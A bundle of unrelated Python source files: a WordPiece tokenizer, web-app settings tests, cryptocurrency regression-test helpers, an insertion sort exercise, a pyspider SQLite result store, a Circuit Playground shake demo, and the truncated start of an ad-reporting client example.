# words in the English Wikipedia.).
text = self._tokenize_chinese_chars(text)
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case:
token = token.lower()
token = self._run_strip_accents(token)
split_tokens.extend(self._run_split_on_punc(token))
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text):
"""Splits punctuation on a piece of text."""
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
if _is_punctuation(char):
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
    # like all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer(object):
"""Runs WordPiece tokenziation."""
def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
self.vocab = vocab
self.unk_token = unk_token
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
"""Tokenizes a piece of text into its word pieces.
This uses a greedy longest-match-first algorithm to perform tokenization
using the given vocabulary.
For example:
input = "unaffable"
output = ["un", "##aff", "##able"]
Args:
text: A single token or whitespace separated tokens. This should have
        already been passed through `BasicTokenizer`.
Returns:
A list of wordpiece tokens.
"""
text = convert_to_unicode(text)
output_tokens = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
output_tokens.append(self.unk_token)
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr
if substr in self.vocab:
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_bad:
output_tokens.append(self.unk_token)
else:
output_tokens.extend(sub_tokens)
return output_tokens
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
  # \t, \n, and \r are technically control characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
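# Minimal usage sketch (not part of the original module; the vocab entries are
# made up for the demo): tokenize one word with a tiny in-memory vocabulary.
if __name__ == "__main__":
  _demo_vocab = collections.OrderedDict(
      (tok, i) for i, tok in enumerate(["un", "##aff", "##able", "[UNK]"]))
  _demo_tokenizer = WordpieceTokenizer(vocab=_demo_vocab)
  print(_demo_tokenizer.tokenize("unaffable"))  # ['un', '##aff', '##able']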
|
from cone.app import get_root
from cone.app import register_plugin_config
from cone.app import testing
from cone.app.browser.ajax import AjaxAction
from cone.app.browser.form import Form
from cone.app.browser.settings import settings_tab_content
from cone.app.browser.settings import SettingsBehavior
from cone.app.model import BaseNode
from cone.tile import render_tile
from cone.tile import Tile
from cone.tile import tile
from cone.tile.tests import TileTestCase
from plumber import plumbing
from yafowil.base import factory
class SomeSettings(BaseNode):
pass
class OtherSettings(BaseNode):
pass
class TestBrowserSettings(TileTestCase):
layer = testing.security
def test_register_plugin_config(self):
root = get_root()
settings = root['settings']
settings.factories.clear()
register_plugin_config('foo', SomeSettings)
register_plugin_config('bar', SomeSettings)
register_plugin_config('baz', OtherSettings)
self.assertEqual(settings.factories.keys(), ['foo', 'bar', 'baz'])
err = self.expectError(
ValueError,
register_plugin_config,
'baz',
OtherSettings
)
self.assertEqual(str(err), "Config with name 'baz' already registered.")
def test_settings_content_tile(self):
root = get_root()
settings = root['settings']
settings.factories.clear()
register_plugin_config('foo', SomeSettings)
register_plugin_config('bar', SomeSettings)
register_plugin_config('baz', OtherSettings)
request = self.layer.new_request()
# Login and render 'content' tile on ``Settings`` node
with self.layer.authenticated('manager'):
res = render_tile(settings, request, 'content')
self.assertTrue(res.find('foo</a>') > -1)
self.assertTrue(res.find('bar</a>') > -1)
self.assertTrue(res.find('baz</a>') > -1)
# 'content' tile for ``SomeSettings``
with self.layer.hook_tile_reg():
@tile(name='content', interface=SomeSettings)
class SomeSettingsTile(Tile):
def render(self):
return '<div>Settings Contents</div>'
with self.layer.authenticated('manager'):
res = render_tile(settings['foo'], request, 'content')
self.assertEqual(res, '<div>Settings Contents</div>')
# 'content' tile for ``OtherSettings`` which raises an exception at
# render time
with self.layer.hook_tile_reg():
@tile(name='content', interface=OtherSettings)
class OtherSettingsTile(Tile):
def render(self):
msg = 'This tile can not be rendered for some reason'
raise Exception(msg)
with self.layer.authenticated('manager'):
err = self.expectError(
Exception,
render_tile,
settings['baz'],
request,
'content'
)
self.assertEqual(
str(err),
'This tile can not be rendered for some reason'
)
def test_SettingsBehavior(self):
root = get_root()
settings = root['settings']
settings.factories.clear()
register_plugin_config('foo', SomeSettings)
with self.layer.hook_tile_reg():
@tile(name='editform', interface=SomeSettings)
@plumbing(SettingsBehavior)
class SomeSettingsForm(Form):
def prepare(self):
form = factory(
u'form',
name='editform',
props={
'action': self.nodeurl
})
form['foo'] = factory(
'field:label:text',
props={
'label': 'Foo',
})
form['save'] = factory(
'submit',
props={
'action': 'save',
'expression': True,
'handler': None,
'next': self.next,
'label': 'Save',
})
self.form = form
request = self.layer.new_request()
request.params['action.editform.save'] = '1'
request.params['editform.foo'] = 'foo'
request.params['ajax'] = '1'
with self.layer.authenticated('manager'):
res = render_tile(settings['foo'], request, 'editform')
self.assertEqual(res, u'')
action = request.environ['cone.app.continuation'][0]
self.assertTrue(isinstance(action, AjaxAction))
self.assertEqual(action.selector, '.foo')
def test_settings_tab_content(self):
root = get_root()
settings = root['settings']
settings.factories.clear()
register_plugin_config('foo', SomeSettings)
register_plugin_config('baz', OtherSettings)
with self.layer.hook_tile_reg():
@tile(name='content', interface=SomeSettings)
class SomeSettingsTile(Tile):
def render(self):
return '<div>Settings Contents</div>'
@tile(name='content', interface=OtherSettings)
class OtherSettingsTile(Tile):
def render(self):
msg = 'This tile can not be rendered for some reason'
raise Exception(msg)
# Ajax view for tabs
request = self.layer.new_request()
with self.layer.authenticated('manager'):
response = settings_tab_content(settings['foo'], request)
self.assertEqual(
response.text,
'<div class="foo"><div>Settings Contents</div></div>'
)
with self.layer.authenticated('manager'):
response = settings_tab_content(settings['baz'], request)
self.checkOutput("""
<div class="baz">...Exception: This tile can not be rendered for some
reason\n</pre></div></div>
""", response.text)
|
#!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Helpful routines for regression testing."""
from base64 import b64encode
from binascii import hexlify, unhexlify
from decimal import Decimal, ROUND_DOWN
import hashlib
import json
import logging
import os
import random
import re
from subprocess import CalledProcessError
import time
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
logger = logging.getLogger("TestFramework.utils")
# Assert functions
##################
def assert_fee_amount(fee, tx_size, fee_per_kB):
"""Assert the fee was in range"""
target_fee = round(tx_size * fee_per_kB / 1000, 8)
if fee < target_fee:
raise AssertionError("Fee of %s BTC too low! (Should be %s BTC)" % (str(fee), str(target_fee)))
# allow the wallet's estimation to be at most 2 bytes off
if fee > (tx_size + 20) * fee_per_kB / 1000:
raise AssertionError("Fee of %s BTC too high! (Should be %s BTC)" % (str(fee), str(target_fee)))
def assert_equal(thing1, thing2, *args):
if thing1 != thing2 or any(thing1 != arg for arg in args):
raise AssertionError("not(%s)" % " == ".join(str(arg) for arg in (thing1, thing2) + args))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s" % (str(thing1), str(thing2)))
def assert_greater_than_or_equal(thing1, thing2):
if thing1 < thing2:
raise AssertionError("%s < %s" % (str(thing1), str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
assert_raises_message(exc, None, fun, *args, **kwds)
def assert_raises_message(exc, message, fun, *args, **kwds):
try:
fun(*args, **kwds)
except JSONRPCException:
raise AssertionError("Use assert_raises_rpc_error() to test RPC failures")
except exc as e:
if message is not None and message not in e.error['message']:
raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_raises_process_error(returncode, output, fun, *args, **kwds):
"""Execute a process and asserts the process return code and output.
Calls function `fun` with arguments `args` and `kwds`. Catches a CalledProcessError
and verifies that the return code and output are as expected. Throws AssertionError if
no CalledProcessError was raised or if the return code and output are not as expected.
Args:
returncode (int): the process return code.
output (string): [a substring of] the process output.
fun (function): the function to call. This should execute a process.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
try:
fun(*args, **kwds)
except CalledProcessError as e:
if returncode != e.returncode:
raise AssertionError("Unexpected returncode %i" % e.returncode)
if output not in e.output:
raise AssertionError("Expected substring not found:" + e.output)
else:
raise AssertionError("No exception raised")
def assert_raises_rpc_error(code, message, fun, *args, **kwds):
"""Run an RPC and verify that a specific JSONRPC exception code and message is raised.
Calls function `fun` with arguments `args` and `kwds`. Catches a JSONRPCException
and verifies that the error code and message are as expected. Throws AssertionError if
no JSONRPCException was raised or if the error code/message are not as expected.
Args:
code (int), optional: the error code returned by the RPC call (defined
in src/rpc/protocol.h). Set to None if checking the error code is not required.
message (string), optional: [a substring of] the error string returned by the
RPC call. Set to None if checking the error string is not required.
fun (function): the function to call. This should be the name of an RPC.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
assert try_rpc(code, message, fun, *args, **kwds), "No exception raised"
def try_rpc(code, message, fun, *args, **kwds):
"""Tries to run an rpc command.
Test against error code and message if the rpc fails.
Returns whether a JSONRPCException was raised."""
try:
fun(*args, **kwds)
except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if (code is not None) and (code != e.error["code"]):
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if (message is not None) and (message not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
return True
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
return False
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, str):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find=False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find:
assert_equal(expected, {})
num_matched = 0
for item in object_array:
all_match = True
for key, value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find:
num_matched = num_matched + 1
for key, value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s" % (str(item), str(key), str(value)))
num_matched = num_matched + 1
if num_matched == 0 and not should_not_find:
raise AssertionError("No objects matched %s" % (str(to_match)))
if num_matched > 0 and should_not_find:
raise AssertionError("Objects were found %s" % (str(to_match)))
# Utility functions
###################
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n))) * 1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hash256(byte_str):
sha256 = hashlib.sha256()
sha256.update(byte_str)
sha256d = hashlib.sha256()
sha256d.update(sha256.digest())
return sha256d.digest()[::-1]
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
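# e.g. satoshi_round("0.123456789") == Decimal("0.12345678"); ROUND_DOWN always
# truncates toward zero rather than rounding to nearest.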
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf'), lock=None):
if attempts == float('inf') and timeout == float('inf'):
timeout = 60
attempt = 0
timeout += time.time()
while attempt < attempts and time.time() < timeout:
if lock:
with lock:
if predicate():
return
else:
if predicate():
return
attempt += 1
time.sleep(0.5)
# Print the cause of the timeout
assert_greater_than(attempts, attempt)
assert_greater_than(timeout, time.time())
raise RuntimeError('Unreachable')
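# Typical usage (illustrative; `node` is a hypothetical RPC proxy): poll every
# 0.5s until the predicate holds or 30 seconds elapse:
#
#   wait_until(lambda: node.getconnectioncount() >= 2, timeout=30)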
# RPC/P2P connection constants and functions
############################################
# The maximum number of nodes a single test can spawn
MAX_NODES = 8
# Don't assign rpc or p2p ports lower than this
PORT_MIN = 11000
# The number of ports to "reserve" for p2p and rpc, each
PORT_RANGE = 5000
class PortSeed:
# Must be initialized with a unique integer for each process
n = None
def get_rpc_proxy(url, node_number, timeout=None, coveragedir=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
coveragedir, node_number) if coveragedir else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def p2p_port(n):
assert(n <= MAX_NODES)
return PORT_MIN + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_port(n):
return PORT_MIN + PORT_RANGE + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_url(datadir, i, rpchost=None):
rpc_u, rpc_p = get_auth_cookie(datadir)
host = '127.0.0.1'
port = rpc_port(i)
if rpchost:
parts = rpchost.split(':')
if len(parts) == 2:
host, port = parts
else:
host = rpchost
return "http://%s:%s@%s:%d" % (rpc_u, rpc_p, host, int(port))
# Node functions
################
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node" + str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
rpc_u, rpc_p = rpc_auth_pair(n)
with open(os.path.join(datadir, "bitcrexcoin.conf"), 'w', encoding='utf8') as f:
f.write("regtest=1\n")
f.write("rpcuser=" + rpc_u + "\n")
f.write("rpcpassword=" + rpc_p + "\n")
f.write("port=" + str(p2p_port(n)) + "\n")
f.write("rpcport=" + str(rpc_port(n)) + "\n")
f.write("listenonion=0\n")
f.write("enablezeromint=0\n")
f.write("precompute=0\n")
f.write("staking=0\n")
f.write("spendzeroconfchange=1\n")
return datadir
def rpc_auth_pair(n):
    return 'rpcuser💻' + str(n), 'rpcpass🔑' + str(n)
def get_datadir_path(dirname, n):
return os.path.join(dirname, "node" + str(n))
def get_auth_cookie(datadir):
user = None
password = None
if os.path.isfile(os.path.join(datadir, "bitcrexcoin.conf")):
with open(os.path.join(datadir, "bitcrexcoin.conf"), 'r', encoding='utf8') as f:
for line in f:
if line.startswith("rpcuser="):
assert user is None # Ensure that there is only one rpcuser line
user = line.split("=")[1].strip("\n")
if line.startswith("rpcpassword="):
assert password is None # Ensure that there is only one rpcpassword line
password = line.split("=")[1].strip("\n")
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")):
with open(os.path.join(datadir, "regtest", ".cookie"), 'r') as f:
userpass = f.read()
split_userpass = userpass.split(':')
user = split_userpass[0]
password = split_userpass[1]
if user is None or password is None:
raise ValueError("No RPC credentials")
return user, password
# If a cookie file exists in the given datadir, delete it.
def delete_cookie_file(datadir):
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")):
logger.debug("Deleting leftover cookie file")
os.remove(os.path.join(datadir, "regtest", ".cookie"))
def get_bip9_status(node, key):
info = node.getblockchaininfo()
return info['bip9_softforks'][key]
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def disconnect_nodes(from_connection, node_num):
for addr in [peer['addr'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']]:
try:
from_connection.disconnectnode(addr)
except JSONRPCException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(lambda: [peer['addr'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']] == [], timeout=5)
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:" + str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in from_connection.getpeerinfo()))
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def sync_blocks(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same tip.
sync_blocks needs to be called with an rpc_connections set that has least
one node already synced to the latest, stable tip, otherwise there's a
chance it might return before all nodes are stably synced.
"""
# Use getblockcount() instead of waitforblockheight() to determine the
# initial max height because the two RPCs look at different internal global
# variables (chainActive vs latestBlock) and the former gets updated
# earlier.
time.sleep(5)
maxheight = max(x.getblockcount() for x in rpc_connections)
start_time = cur_time = time.time()
while cur_time <= start_time + timeout:
tips = [r.waitforblockheight(maxheight, int(wait * 1000)) for r in rpc_connections]
if all(t["height"] == maxheight for t in tips):
if all(t["hash"] == tips[0]["hash"] for t in tips):
return
raise AssertionError("Block sync failed, mismatched block hashes:{}".format(
"".join("\n {!r}".format(tip) for tip in tips)))
cur_time = time.time()
raise AssertionError("Block sync to height {} timed out:{}".format(
maxheight, "".join("\n {!r}".format(tip) for tip in tips)))
def sync_chain(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same best block
"""
while timeout > 0:
best_hash = [x.getbestblockhash() for x in rpc_connections]
if best_hash == [best_hash[0]] * len(best_hash):
return
time.sleep(wait)
timeout -= wait
raise AssertionError("Chain sync failed: Best block hashes don't match")
def sync_mempools(rpc_connections, *, wait=1, timeout=60, flush_scheduler=True):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while timeout > 0:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match + 1
if num_match == len(rpc_connections):
#if flush_scheduler:
#for r in rpc_connections:
# r.syncwithvalidationinterfacequeue()
return
time.sleep(wait)
timeout -= wait
raise AssertionError("Mempool sync failed")
# Transaction/Block functions
#############################
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found" % (txid, str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >= 0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({"txid": t["txid"], "vout": t["vout"], "address": t["address"]})
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out + fee
change = amount_in - amount
if change > amount * 2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change / 2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment * random.randint(0, fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount + fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
to_generate = int(0.5 * count) + 101
while to_generate > 0:
node.generate(min(25, to_generate))
to_generate -= 25
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in range(iterations):
t = utxos.pop()
inputs = []
inputs.append({"txid": t["txid"], "vout": t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = float(satoshi_round(send_value / 2))
outputs[addr2] = float(satoshi_round(send_value / 2))
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransaction(raw_tx)["hex"]
node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" # OP_RETURN OP_PUSH2 512 bytes
for i in range(512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in range(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
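# Decoding the constants above: "6a4d0200" is OP_RETURN (0x6a) followed by
# OP_PUSHDATA2 (0x4d) with a little-endian length of 0x0200 = 512 bytes, so each
# script_pubkey is 4 + 512 = 516 bytes. "81" is the compact-size output count
# (0x81 = 129: 128 OP_RETURN outputs plus the change output spliced in later),
# and "fd0402" is the compact-size script length 0x0204 = 516.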
def create_tx(node, coinbase, to_address, amount):
inputs = [{"txid": coinbase, "vout": 0}]
outputs = {to_address: amount}
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, num, fee):
addr = node.getnewaddress()
txids = []
for _ in range(num):
t = utxos.pop()
inputs = [{"txid": t["txid"], "vout": t["vout"]}]
outputs = {}
change = t['amount'] - fee
outputs[addr] = float(satoshi_round(change))
rawtx = node.createrawtransaction(inputs, outputs)
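        # Splice point: the first 92 hex chars cover version (8) + input count (2)
        # + txid (64) + vout (8) + empty scriptSig length (2) + sequence (8);
        # chars 92:94 are the original "01" output count, which "txouts" replaces
        # with its own count ("81" = 129) and the OP_RETURN outputs.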
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransaction(newtx, None, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def mine_large_block(node, utxos=None):
    # generate 66k-sized transactions;
    # 14 of them together come close to the 1MB block limit
num = 14
txouts = gen_return_txouts()
utxos = utxos if utxos is not None else []
if len(utxos) < num:
utxos.clear()
utxos.extend(node.listunspent())
fee = 100 * node.getnetworkinfo()["relayfee"]
create_lots_of_big_transactions(node, txouts, utxos, num, fee=fee)
node.generate(1)
|
##Question 16
##Implement insertion sort in python. Don’t use Python’s built in sort or sorted.
##Make classes for a node, with pointers for next
##Assume your inputs will be sufficient for the memory you have.
##Example inputs
##>>> 11,127,56,2,1,5,7,9,11,65,12,24,76,87,123,65,8,32,86,123,67,1,67,92,72,39,49,12
##>>> 98,52,45,19,37,22,1,66,943,415,21,785,12,698,26,36,18,97,0,63,25,85,24,94,1501
def insert_sort(alist):
    """ Function to sort a given list using insertion sort """
    for i in range(0, len(alist)-1):
        current = i+1
        while current > 0:
            ### if the current number is less than the number on its left, swap the values
            if alist[current] < alist[current-1]:
                alist[current], alist[current-1] = alist[current-1], alist[current]
            print(alist)
            current = current - 1
    return alist

print(insert_sort([11,126,54,2,1,65,24,77,93,31,44,55,20]))
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-10-13 17:08:43
import re
import time
import json
from .sqlitebase import SQLiteMixin, SplitTableMixin
from pyspider.database.base.resultdb import ResultDB as BaseResultDB
from pyspider.database.basedb import BaseDB
class ResultDB(SQLiteMixin, SplitTableMixin, BaseResultDB, BaseDB):
__tablename__ = 'resultdb'
placeholder = '?'
def __init__(self, path):
self.path = path
self.last_pid = 0
self.conn = None
self._list_project()
def _create_project(self, project):
assert re.match(r'^\w+$', project) is not None
tablename = self._tablename(project)
self._execute('''CREATE TABLE IF NOT EXISTS `%s` (
taskid PRIMARY KEY,
url,
result,
updatetime
)''' % tablename)
def _parse(self, data):
if 'result' in data:
data['result'] = json.loads(data['result'])
return data
def _stringify(self, data):
if 'result' in data:
data['result'] = json.dumps(data['result'])
return data
def save(self, project, taskid, url, result):
tablename = self._tablename(project)
if project not in self.projects:
self._create_project(project)
self._list_project()
obj = {
'taskid': taskid,
'url': url,
'result': result,
'updatetime': time.time(),
}
return self._replace(tablename, **self._stringify(obj))
def select(self, project, fields=None, offset=0, limit=None):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return
tablename = self._tablename(project)
for task in self._select2dic(tablename, what=fields, order='updatetime DESC',
offset=offset, limit=limit):
yield self._parse(task)
def count(self, project):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return 0
tablename = self._tablename(project)
for count, in self._execute("SELECT count(1) FROM %s" % self.escape(tablename)):
return count
def get(self, project, taskid, fields=None):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return
tablename = self._tablename(project)
where = "`taskid` = %s" % self.placeholder
for task in self._select2dic(tablename, what=fields,
where=where, where_values=(taskid, )):
return self._parse(task)
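# Usage sketch (illustrative only; 'myproject', the taskid, the URL and the
# './result.db' path are made-up values, not part of the original module):
#
#   db = ResultDB('./result.db')
#   db.save('myproject', 'task-1', 'http://example.com', {'title': 'Example'})
#   for row in db.select('myproject'):
#       print(row['taskid'], row['result'])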
|
from adafruit_circuitplayground.express import cpx
while True:
if cpx.shake():
print("Shake detected!")
cpx.red_led = True
else:
cpx.red_led = False
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example fetches data from PQL tables and creates match table files."""
import tempfile
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize a report downloader.
report_downloader = client.GetDataDownloader(version='v201902')
line_items_file = tempfile.NamedTemporaryFile(
